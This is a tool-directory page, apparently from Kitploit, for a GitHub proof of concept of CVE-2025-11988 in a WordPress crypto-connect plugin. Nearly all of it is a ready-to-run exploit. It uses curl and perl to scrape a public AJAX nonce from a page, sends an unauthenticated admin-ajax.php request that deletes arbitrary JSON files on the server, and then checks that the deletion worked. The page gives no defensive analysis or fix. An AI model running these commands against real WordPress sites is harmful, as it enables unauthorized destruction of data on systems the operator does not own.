Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-11988 | Kitploit
Tools/GitHubGitHub/jfriedli/cve-2025-11988
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubjfriedli/cve-2025-11988

CVE-2025-11988

View Repository
5 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

1) Extract the public crypto_ajax nonce

root@kitploit:~
UA='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0'
PAGE_URL='http://localhost/wordpress/<ANY_PAGE>/'

NONCE=$(curl -s "$PAGE_URL" -A "$UA" | \
  perl -0777 -ne 'print "$1\n" if /crypto_connectChainAjax\s*=\s*\{[^}]*"nonce"\s*:\s*"([^"]+)"/s')

# Fallback extraction
[ -z "$NONCE" ] && NONCE=$(curl -s "$PAGE_URL" -A "$UA" | \
  perl -ne "print \"$1\n\" if /create_link_crypto_connect_login\\(\\s*'([A-Za-z0-9_-]+)'/i")

echo "Nonce: $NONCE"

2) Delete arbitrary JSON file (unauthenticated)

root@kitploit:~
curl -s "http://localhost/wordpress/wp-admin/admin-ajax.php" -A "$UA" \
  --data "action=crypto_connect_ajax_process&method_name=crypto_delete_json&id=1&nonce=${NONCE}&param1=order123"

param1 corresponds to the filename prefix (e.g., order123 → order123_pending.json)


3) Verify deletion

root@kitploit:~
if [ -e "$BASEDIR/yak/order123_pending.json" ]; then
  echo "[-] File still exists"
else
  echo "[+] Deleted successfully"
fi
Download Tool